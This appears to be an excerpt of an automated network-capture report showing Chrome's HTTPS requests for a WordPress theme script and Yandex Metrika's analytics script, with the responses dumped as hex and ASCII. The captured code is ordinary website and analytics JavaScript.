                                                                                                                                              2025-01-03 16:33:03 UTC1390INData Raw: 17 b7 dd 21 e4 02 00 08 86 c4 9c b9 8c f9 3b 72 01 00 04 43 e2 c4 ed 34 e9 8c 0f 0e 0e b2 2c 06 00 08 86 c4 ad b9 38 c8 05 00 10 0c 89 26 17 6a 2e 00 80 60 48 f4 65 31 6a 2e 00 80 60 48 f4 99 0b 35 17 00 40 30 a4 34 72 61 e6 02 00 08 86 44 af b9 48 3a 8c 5c 20 90 65 d9 fc 04 00 c1 90 18 cf b9 b0 5b 0c a6 09 67 cc 59 30 db 3b 3a 3a 16 25 00 08 86 b0 15 19 62 d1 d7 d7 57 ef d3 1b c6 fd 2a 86 26 24 03 08 86 50 73 81 28 b4 b5 b5 2d 93 74 73 78 78 38 ec 28 9c 70 ff 38 c9 a9 d9 80 60 c8 1f d5 5c 24 3d f2 a9 c8 d4 5c e0 07 cd cd cd f3 dc 37 4e 85 ad ea df cf a0 2b 48 9a 70 1a 99 c9 00 82 21 bf 4c f8 df 53 73 81 62 a4 69 ba de e3 73 34 88 25 f4 95 19 92 79 e3 ef 27 98 c9 00 82 21 b9 91 34 15 17 70 cf 38 4b 13 80 ef 84 9b 0d f7 91 8b 33 e4 32 4b 32 1e b3 af 79 83
                                                                                                                                              Data Ascii: !;rC4,8&j.`He1j.`H5@04raDH:\ e[gY0;::%bW*&$Ps(-tsxx8(p8`\$=\7N+Hp!LSsbis4%y'!4p8K32K2y
                                                                                                                                              2025-01-03 16:33:03 UTC1390INData Raw: 4d 91 fd f2 9d 6b 59 ee f6 7a 3a bc bf 7c bb d5 63 7f 09 91 f9 c0 63 c5 5a 44 06 43 60 a0 e4 29 cd 3e 1e 77 1f e8 f5 40 7a 5f 5f 5f df f2 9e 9e 9e cb 33 19 84 c5 2c b3 97 b7 c5 ed 73 50 d2 29 b7 55 bd ff 28 09 91 19 71 3f 59 83 c8 60 08 0c 94 9c 9f c9 e7 13 26 24 ed 77 8e e1 09 7b 35 2b f3 93 01 ea 69 20 89 12 2f 8d 21 2c 16 da 47 25 bd 67 fe cc 4f 92 a8 fb 7e 52 10 19 49 c3 23 23 23 eb 10 19 0c 81 81 b9 78 34 53 3e 7e 22 69 bb 69 1d 1d 1d 5d 9a f7 6a 2e aa d5 bd 5a 62 ca b1 eb b8 35 d9 63 79 d2 9f 7d 50 d2 1f 08 4b d1 75 32 39 1f 87 c3 93 61 da 3b 86 c0 c0 5c a7 36 07 87 dd 37 de 70 1f 79 cc ac 8d 15 eb 31 fb 2c 06 96 1a d8 17 bf d1 9f e9 6a 49 77 f8 73 ef 8c 15 ec 92 72 f1 d9 f9 3e 94 24 32 43 ee 0f ab f1 64 30 04 06 e6 2c 34 81 a4 d3 ee 27 df 98 d7 25
                                                                                                                                              Data Ascii: MkYz:|ccZDC`)>w@z___3,sP)U(q?Y`&$w{5+i /!,G%gO~RI###x4S>~"ii]j.Zb5cy}PKu29a;\67py1,jIwsr>$2Cd0,4'%
                                                                                                                                              2025-01-03 16:33:03 UTC1390INData Raw: fd e5 44 34 46 20 10 8c e6 ff 5e 06 f8 7b b6 b9 96 c5 ae 15 9f 35 76 59 c1 a1 d7 8b 82 0d cd 64 56 f7 63 fb 32 00 71 3b 73 b1 05 73 9e fb 9f 10 d1 38 81 40 30 ba e5 c2 1c e5 fe 0a b7 5c ae 9d 59 79 d6 b8 0f 0a 9b df 2d 32 ea 7f 97 2a 84 33 32 00 c4 a1 5c 78 59 fc 22 f7 f3 89 28 45 20 10 8c 07 72 f9 83 bf 5f 3a 11 4d 16 37 98 d4 cf ac 94 74 df c1 2c bf 51 7f 9c 54 15 24 03 40 7c cd 5c da b9 f5 0f 8f 7d 04 82 d1 5d 73 b1 e5 c2 fd 8c 91 fc 82 3d 99 dd 39 31 a3 e8 e0 ea 52 d9 70 5c aa ca 41 48 06 80 b8 98 b9 74 70 3f 10 0c 06 ef 17 08 04 e3 45 cd c5 96 4b 20 10 98 22 46 98 39 9f 76 dd b3 d2 df bc 76 9b b1 eb 94 54 38 ed 0f c0 28 97 4b 27 b7 c1 48 24 f2 80 40 20 18 0f 96 c5 6c b9 ac 70 e4 a2 23 4f e7 74 df 9b e9 fb 65 3d 4b e6 0c 99 21 cc 64 00 18 85 72 61 ba
                                                                                                                                              Data Ascii: D4F ^{5vYdVc2q;ss8@0\Yy-2*32\xY"(E r_:M7t,QT$@|\}]s=91Rp\AHtp?EK "F9vvT8(K'H$@ lp#Ote=K!dra


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              92192.168.2.164982089.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:03 UTC446OUTGET /wp-content/themes/enfold/js/shortcodes.js?ver=4.5 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
                                                                                                                                              2025-01-03 16:33:04 UTC277INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:03 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 40642
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:17:10 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:04 UTC16107INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 24 29 0a 7b 09 0a 20 20 20 20 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 0a 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 0a 20 20 20 20 7b 09 0a 20 20 20 20 09 2f 2f 67 6c 6f 62 61 6c 20 76 61 72 69 61 62 6c 65 73 20 74 68 61 74 20 61 72 65 20 75 73 65 64 20 6f 6e 20 73 65 76 65 72 61 6c 20 6f 63 61 73 73 69 6f 6e 73 0a 20 20 20 20 09 24 2e 61 76 69 61 5f 75 74 69 6c 69 74 69 65 73 20 3d 20 24 2e 61 76 69 61 5f 75 74 69 6c 69 74 69 65 73 20 7c 7c 20 7b 7d 3b 0a 20 20 20 20 09 0a 20 20 20 20 09 69 66 28 20 2f 41 6e 64 72 6f 69 64 7c 77 65 62 4f 53 7c 69 50 68 6f 6e 65 7c 69 50 61 64 7c 69 50 6f 64 7c 42 6c 61 63 6b 42 65 72 72 79 7c 49 45 4d 6f 62 69 6c 65 7c 4f 70 65 72 61 20
                                                                                                                                              Data Ascii: (function($){ "use strict"; $(document).ready(function() { //global variables that are used on several ocassions $.avia_utilities = $.avia_utilities || {}; if( /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera
                                                                                                                                              2025-01-03 16:33:04 UTC16384INData Raw: 2f 2f 69 65 38 20 6e 65 65 64 73 20 64 69 66 66 65 72 65 6e 74 20 69 6e 73 65 72 74 20 6d 65 74 68 6f 64 0a 09 09 09 74 72 79 7b 0a 09 09 09 09 63 73 73 5f 62 6c 6f 63 6b 2e 74 65 78 74 28 63 73 73 29 3b 20 0a 09 09 09 7d 0a 09 09 09 63 61 74 63 68 28 65 72 72 29 7b 0a 09 09 09 09 63 73 73 5f 62 6c 6f 63 6b 2e 72 65 6d 6f 76 65 28 29 3b 0a 09 09 09 09 63 73 73 5f 62 6c 6f 63 6b 20 3d 20 24 28 22 3c 73 74 79 6c 65 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 69 64 3d 27 61 76 2d 62 72 6f 77 73 65 72 2d 68 65 69 67 68 74 27 3e 22 2b 63 73 73 2b 22 3c 2f 73 74 79 6c 65 3e 22 29 2e 61 70 70 65 6e 64 54 6f 28 27 68 65 61 64 3a 66 69 72 73 74 27 29 3b 0a 09 09 09 7d 0a 09 09 09 0a 09 09 09 0a 09 09 09 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f
                                                                                                                                              Data Ascii: //ie8 needs different insert methodtry{css_block.text(css); }catch(err){css_block.remove();css_block = $("<style type='text/css' id='av-browser-height'>"+css+"</style>").appendTo('head:first');}setTimeout(functio
                                                                                                                                              2025-01-03 16:33:04 UTC8151INData Raw: 30 2e 30 38 35 2c 20 30 2e 34 39 30 2c 20 31 2e 33 36 35 29 27 20 0a 09 09 7d 3b 0a 0a 09 2f 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0a 09 63 68 65 63 6b 20 69 66 20 61 20 63 73 73 20 66 65 61 74 75 72 65 20 69 73 20 73 75 70 70 6f 72 74 65 64 20 61 6e 64 20 73 61 76 65 20 69 74 20 74 6f 20 74 68 65 20 73 75 70 70 6f 72 74 65 64 20 61 72 72 61 79 0a 09 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2f 0a 09 24 2e
                                                                                                                                              Data Ascii: 0.085, 0.490, 1.365)' };/************************************************************************check if a css feature is supported and save it to the supported array*************************************************************************/$.


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              93192.168.2.164982277.88.21.1194436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:03 UTC530OUTGET /metrika/tag.js HTTP/1.1
                                                                                                                                              Host: mc.yandex.ru
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:33:04 UTC1328INHTTP/1.1 200 OK
                                                                                                                                              Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                              Cache-Control: max-age=3600
                                                                                                                                              Connection: Close
                                                                                                                                              Content-Length: 227261
                                                                                                                                              Content-Type: application/javascript
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:03 GMT
                                                                                                                                              ETag: "67655eba-377bd"
                                                                                                                                              Expires: Fri, 03 Jan 2025 17:33:03 GMT
                                                                                                                                              Last-Modified: Fri, 20 Dec 2024 12:10:34 GMT
                                                                                                                                              Set-Cookie: _yasc=MfiMZP/ywC22bLA7Lzg08CDJ2T5ZeMg801gQ1aiOrmsTbU2IFgvYmkSSBmQrRQ+YYiw=; domain=.yandex.ru; path=/; expires=Mon, 01 Jan 2035 16:33:03 GMT; secure
                                                                                                                                              Set-Cookie: i=MWn/b3CGBdGz4xwo6ybs8zuB0m6dqTWEZs6SfrZEPLGuS1njVyPf5dksYDS0w6MqEEVqybkB7y6BVJBOmOuiQIuKgyY=; Expires=Sun, 03-Jan-2027 16:33:03 GMT; Domain=.yandex.ru; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                              Set-Cookie: yandexuid=5258352291735921983; Expires=Sun, 03-Jan-2027 16:33:03 GMT; Domain=.yandex.ru; Path=/; Secure; SameSite=None
                                                                                                                                              Set-Cookie: yashr=2056106971735921983; Path=/; Domain=.yandex.ru; Expires=Sat, 03 Jan 2026 16:33:03 GMT; SameSite=None; Secure; HttpOnly
                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                              2025-01-03 16:33:04 UTC5565INData Raw: ef bb bf 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 4c 61 28 62 61 29 7b 76 61 72 20 74 61 3d 30 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 61 3c 62 61 2e 6c 65 6e 67 74 68 3f 7b 64 6f 6e 65 3a 21 31 2c 76 61 6c 75 65 3a 62 61 5b 74 61 2b 2b 5d 7d 3a 7b 64 6f 6e 65 3a 21 30 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 75 28 62 61 29 7b 76 61 72 20 74 61 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 26 26 62 61 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3b 69 66 28 74 61 29 72 65 74 75 72 6e 20 74 61 2e 63 61 6c 6c 28 62 61 29 3b 69 66 28 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 62 61 2e 6c 65 6e 67 74 68
                                                                                                                                              Data Ascii: (function(){function La(ba){var ta=0;return function(){return ta<ba.length?{done:!1,value:ba[ta++]}:{done:!0}}}function u(ba){var ta="undefined"!=typeof Symbol&&Symbol.iterator&&ba[Symbol.iterator];if(ta)return ta.call(ba);if("number"==typeof ba.length
                                                                                                                                              2025-01-03 16:33:04 UTC8168INData Raw: 74 69 6f 6e 28 63 29 7b 63 3d 41 28 7b 70 65 72 6d 69 73 73 69 6f 6e 73 3a 61 7d 2c 63 29 3b 72 65 74 75 72 6e 20 62 2e 6f 61 28 63 29 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 5a 6d 28 61 2c 62 2c 63 29 7b 62 3d 75 28 62 29 3b 62 2e 6e 65 78 74 28 29 3b 62 2e 6e 65 78 74 28 29 3b 62 3d 50 61 28 62 29 3b 61 3d 7b 59 3a 63 2e 59 2c 6c 3a 61 2c 65 76 65 6e 74 3a 63 2e 65 76 65 6e 74 7d 3b 76 61 72 20 64 3d 7b 7d 3b 63 3d 41 28 63 2e 64 61 74 61 2c 28 64 2e 79 74 6d 4f 6e 46 61 69 6c 75 72 65 3d 42 2c 64 2e 79 74 6d 4f 6e 53 75 63 63 65 73 73 3d 42 2c 64 29 29 3b 64 3d 7b 7d 3b 63 3d 53 66 28 5b 5d 2c 28 64 2e 75 6e 64 65 66 69 6e 65 64 3d 7b 6b 69 6e 64 3a 30 2c 76 61 6c 75 65 3a 76 6f 69 64 20 30 7d 2c 64 2e 72 65 71 75 69 72 65 3d 7b 6b 69 6e 64 3a 30 2c 76 61
                                                                                                                                              Data Ascii: tion(c){c=A({permissions:a},c);return b.oa(c)}}}function Zm(a,b,c){b=u(b);b.next();b.next();b=Pa(b);a={Y:c.Y,l:a,event:c.event};var d={};c=A(c.data,(d.ytmOnFailure=B,d.ytmOnSuccess=B,d));d={};c=Sf([],(d.undefined={kind:0,value:void 0},d.require={kind:0,va
                                                                                                                                              2025-01-03 16:33:04 UTC8168INData Raw: 63 29 7b 76 61 72 20 64 3d 62 2e 6b 65 79 3b 62 3d 62 2e 64 65 66 61 75 6c 74 56 61 6c 75 65 3b 63 26 26 63 2e 59 2e 63 68 65 63 6b 50 65 72 6d 69 73 73 69 6f 6e 28 7b 70 65 72 6d 69 73 73 69 6f 6e 73 3a 63 2e 70 65 72 6d 69 73 73 69 6f 6e 73 2c 70 65 72 6d 69 73 73 69 6f 6e 54 79 70 65 3a 22 64 61 74 61 4c 61 79 65 72 22 2c 70 65 72 6d 69 73 73 69 6f 6e 50 61 72 61 6d 73 3a 7b 6b 65 79 3a 64 2c 6f 70 65 72 61 74 69 6f 6e 3a 32 7d 7d 29 3b 61 3d 6e 28 61 2c 64 29 3b 72 65 74 75 72 6e 20 52 28 61 29 3f 62 3a 61 7d 66 75 6e 63 74 69 6f 6e 20 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 47 28 61 29 3f 48 28 62 2c 61 29 3a 4e 28 61 29 3f 68 62 28 61 2c 22 22 2b 62 29 3a 21 31 7d 66 75 6e 63 74 69 6f 6e 20 6e 6e 28 61 2c 0a 62 29 7b 69 66 28 21 4e 28 61 29 7c
                                                                                                                                              Data Ascii: c){var d=b.key;b=b.defaultValue;c&&c.Y.checkPermission({permissions:c.permissions,permissionType:"dataLayer",permissionParams:{key:d,operation:2}});a=n(a,d);return R(a)?b:a}function on(a,b){return G(a)?H(b,a):N(a)?hb(a,""+b):!1}function nn(a,b){if(!N(a)|
                                                                                                                                              2025-01-03 16:33:04 UTC8168INData Raw: 2e 69 73 59 61 6e 64 65 78 3f 28 62 28 22 35 22 29 2c 66 2e 46 28 42 69 2c 66 75 6e 63 74 69 6f 6e 28 6d 29 7b 6d 3d 75 28 6d 29 3b 6d 2e 6e 65 78 74 28 29 3b 6d 3d 6d 2e 6e 65 78 74 28 29 2e 76 61 6c 75 65 2e 74 79 70 65 3b 65 28 7b 76 61 6c 75 65 3a 43 69 28 6d 29 7d 29 7d 29 29 3a 28 62 28 22 36 22 29 2c 65 28 6e 75 6c 6c 29 29 7d 29 5b 22 63 61 74 63 68 22 5d 28 67 29 2e 74 68 65 6e 28 46 28 5b 61 2c 68 5d 2c 72 61 29 29 7d 65 6c 73 65 20 65 28 7b 76 61 6c 75 65 3a 61 67 2c 52 64 3a 21 30 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 6b 6f 28 61 2c 62 29 7b 76 61 72 20 63 3d 4f 65 28 61 2c 62 29 3b 63 26 26 63 2e 5a 2e 46 28 5b 22 69 73 59 61 6e 64 65 78 22 5d 2c 0a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 64 3d 7b 7d 3b 72 65 74 75 72 6e 20 64 2e 74
                                                                                                                                              Data Ascii: .isYandex?(b("5"),f.F(Bi,function(m){m=u(m);m.next();m=m.next().value.type;e({value:Ci(m)})})):(b("6"),e(null))})["catch"](g).then(F([a,h],ra))}else e({value:ag,Rd:!0})})}function ko(a,b){var c=Oe(a,b);c&&c.Z.F(["isYandex"],function(){var d={};return d.t
                                                                                                                                              2025-01-03 16:33:04 UTC8168INData Raw: 75 6d 7d 2c 64 2e 58 61 29 3b 76 61 72 20 65 3d 4f 28 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 6b 29 7b 68 3d 68 5b 33 5d 3b 72 65 74 75 72 6e 20 67 26 26 6b 2b 31 3d 3d 3d 68 2e 70 61 72 74 4e 75 6d 7d 2c 21 30 2c 64 2e 58 61 29 2c 66 3d 21 21 64 2e 58 61 5b 64 2e 58 61 2e 6c 65 6e 67 74 68 2d 31 5d 5b 33 5d 2e 65 6e 64 3b 72 65 74 75 72 6e 20 65 26 26 66 7d 3b 74 68 69 73 2e 78 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 52 68 28 64 2e 6c 2c 65 2e 73 6c 69 63 65 28 29 2c 66 75 6e 63 74 69 6f 6e 28 66 29 7b 76 61 72 20 67 3d 75 28 66 29 3b 66 3d 67 2e 6e 65 78 74 28 29 2e 76 61 6c 75 65 3b 76 61 72 20 68 3d 67 2e 6e 65 78 74 28 29 2e 76 61 6c 75 65 3b 67 3d 67 2e 6e 65 78 74 28 29 2e 76 61 6c 75 65 3b 0a 64 2e 73 65 6e 64 28 66 2c 68 2c 67 29 7d 2c 32 30 2c
                                                                                                                                              Data Ascii: um},d.Xa);var e=O(function(g,h,k){h=h[3];return g&&k+1===h.partNum},!0,d.Xa),f=!!d.Xa[d.Xa.length-1][3].end;return e&&f};this.xd=function(e){Rh(d.l,e.slice(),function(f){var g=u(f);f=g.next().value;var h=g.next().value;g=g.next().value;d.send(f,h,g)},20,
                                                                                                                                              2025-01-03 16:33:04 UTC8168INData Raw: 28 62 2e 61 74 74 72 69 62 75 74 65 73 29 29 2c 64 29 3b 41 28 66 2c 24 6f 28 62 2c 65 2c 66 29 29 3b 76 61 72 20 67 3d 28 64 3d 4a 62 28 66 75 6e 63 74 69 6f 6e 28 68 2c 6b 29 7b 76 61 72 20 6c 3d 75 28 6b 29 2c 6d 3d 6c 2e 6e 65 78 74 28 29 2e 76 61 6c 75 65 3b 6c 3d 6c 2e 6e 65 78 74 28 29 2e 76 61 6c 75 65 3b 6c 3d 58 65 28 61 2c 62 2c 6d 2c 6c 2c 63 2c 65 29 3b 76 61 72 20 70 3d 6c 2e 76 61 6c 75 65 3b 68 61 28 70 29 3f 64 65 6c 65 74 65 20 66 5b 6d 5d 3a 66 5b 6d 5d 3d 70 3b 72 65 74 75 72 6e 20 68 7c 7c 6c 2e 70 62 7d 2c 21 31 2c 46 61 28 66 29 29 29 26 26 4e 64 28 62 29 3b 67 26 26 28 66 2e 77 69 64 74 68 3d 0a 67 2e 77 69 64 74 68 2c 66 2e 68 65 69 67 68 74 3d 67 2e 68 65 69 67 68 74 29 3b 72 65 74 75 72 6e 7b 70 62 3a 64 2c 4c 67 3a 66 7d 7d 66
                                                                                                                                              Data Ascii: (b.attributes)),d);A(f,$o(b,e,f));var g=(d=Jb(function(h,k){var l=u(k),m=l.next().value;l=l.next().value;l=Xe(a,b,m,l,c,e);var p=l.value;ha(p)?delete f[m]:f[m]=p;return h||l.pb},!1,Fa(f)))&&Nd(b);g&&(f.width=g.width,f.height=g.height);return{pb:d,Lg:f}}f
                                                                                                                                              2025-01-03 16:33:04 UTC8168INData Raw: 29 3b 69 66 28 2f 2e 2b 73 63 68 65 6d 61 2e 6f 72 67 5c 2f 28 50 65 72 73 6f 6e 7c 4f 72 67 61 6e 69 7a 61 74 69 6f 6e 29 2f 2e 74 65 73 74 28 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 74 65 6d 74 79 70 65 22 29 7c 7c 22 22 29 29 7b 76 61 72 20 67 3d 6e 62 28 64 2e 6c 2c 65 2c 22 6e 61 6d 65 22 29 3b 67 26 26 28 66 2e 6e 61 6d 65 3d 6b 62 28 67 29 29 7d 66 2e 6e 61 6d 65 7c 7c 0a 28 66 2e 6e 61 6d 65 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 63 6f 6e 74 65 6e 74 22 29 7c 7c 53 62 28 65 29 7c 7c 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 68 72 65 66 22 29 29 3b 72 65 74 75 72 6e 20 66 7d 2c 63 29 7d 2c 62 29 3b 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 58 62 28 29 7b 76 61 72 20 61 3d 4f 61 2e 61 70 70 6c 79 28 74 68 69
                                                                                                                                              Data Ascii: );if(/.+schema.org\/(Person|Organization)/.test(e.getAttribute("itemtype")||"")){var g=nb(d.l,e,"name");g&&(f.name=kb(g))}f.name||(f.name=e.getAttribute("content")||Sb(e)||e.getAttribute("href"));return f},c)},b);return a}function Xb(){var a=Oa.apply(thi
                                                                                                                                              2025-01-03 16:33:04 UTC8168INData Raw: 32 35 37 2c 61 2e 74 61 72 67 65 74 2c 77 61 5d 2c 5b 31 39 33 2c 61 2e 70 61 67 65 2c 5a 63 5d 2c 5b 31 32 39 2c 61 2e 79 2c 77 61 5d 2c 5b 36 35 2c 61 2e 78 2c 77 61 5d 5d 7d 66 75 6e 63 74 69 6f 6e 20 4c 70 28 61 29 7b 72 65 74 75 72 6e 5b 5b 31 39 33 2c 0a 61 2e 74 61 72 67 65 74 2c 77 61 5d 2c 5b 31 32 39 2c 61 2e 79 2c 63 61 5d 2c 5b 36 35 2c 61 2e 78 2c 63 61 5d 5d 7d 66 75 6e 63 74 69 6f 6e 20 4d 70 28 61 29 7b 72 65 74 75 72 6e 5b 5b 31 34 38 2c 61 2e 63 68 61 6e 67 65 73 2c 57 70 5d 2c 5b 36 35 2c 61 2e 74 61 72 67 65 74 2c 77 61 5d 5d 7d 66 75 6e 63 74 69 6f 6e 20 57 70 28 61 29 7b 72 65 74 75 72 6e 5b 5b 31 39 33 2c 61 2e 69 6e 64 65 78 2c 63 61 5d 2c 5b 31 34 35 2c 61 2e 6f 70 2c 6a 61 5d 2c 5b 38 31 2c 61 2e 73 74 79 6c 65 2c 6a 61 5d 5d 7d
                                                                                                                                              Data Ascii: 257,a.target,wa],[193,a.page,Zc],[129,a.y,wa],[65,a.x,wa]]}function Lp(a){return[[193,a.target,wa],[129,a.y,ca],[65,a.x,ca]]}function Mp(a){return[[148,a.changes,Wp],[65,a.target,wa]]}function Wp(a){return[[193,a.index,ca],[145,a.op,ja],[81,a.style,ja]]}
                                                                                                                                              2025-01-03 16:33:04 UTC8168INData Raw: 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 5b 63 3e 3e 0a 36 26 36 33 5d 2c 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 5b 63 26 36 33 5d 2c 22 3d 22 2c 22 3d 22 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 63 3d 28 61 5b 64 5d 3c 3c 31 30 29 2b 28 61 5b 64 2b 31 5d 3c 3c 32 29 2c 65 2e 70 75 73 68 28 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39
                                                                                                                                              Data Ascii: NOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="[c>>6&63],"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="[c&63],"=","=");break;case 2:c=(a[d]<<10)+(a[d+1]<<2),e.push("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789
                                                                                                                                              2025-01-03 16:33:04 UTC8168INData Raw: 7c 7c 28 65 2e 70 61 72 61 6d 73 28 61 29 2c 66 2e 70 75 73 68 28 63 29 2c 64 2e 70 61 72 65 6e 74 26 26 28 64 3d 7b 7d 2c 62 2e 64 67 28 28 64 2e 74 79 70 65 3d 22 70 61 72 61 6d 73 22 2c 64 2e 64 61 74 61 3d 61 2c 64 29 29 29 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 7a 69 28 61 2c 62 2c 63 29 7b 63 3d 76 6f 69 64 20 30 3d 3d 3d 63 3f 59 3a 63 3b 76 61 72 20 64 3d 4a 64 28 61 29 3b 63 28 64 29 3b 76 61 72 20 65 3d 78 28 64 2c 6d 72 29 3b 41 64 28 61 2c 62 2c 66 75 6e 63 74 69 6f 6e 28 66 29 7b 66 2e 71 61 2e 46 28 65 29 7d 29 3b 72 65 74 75 72 6e 20 64 7d 66 75 6e 63 74 69 6f 6e 20 6d 72 28 61 2c 62 29 7b 76 61 72 20 63 3d 6e 28 62 2c 22 79 6d 65 74 72 69 6b 61 45 76 65 6e 74 22 29 3b 63 26 26 61 2e 24 28 6e 28 63 2c 22 74 79 70 65 22 29 2c 63 29 7d 66 75 6e
                                                                                                                                              Data Ascii: ||(e.params(a),f.push(c),d.parent&&(d={},b.dg((d.type="params",d.data=a,d))))}}function zi(a,b,c){c=void 0===c?Y:c;var d=Jd(a);c(d);var e=x(d,mr);Ad(a,b,function(f){f.qa.F(e)});return d}function mr(a,b){var c=n(b,"ymetrikaEvent");c&&a.$(n(c,"type"),c)}fun


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              94192.168.2.164981989.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
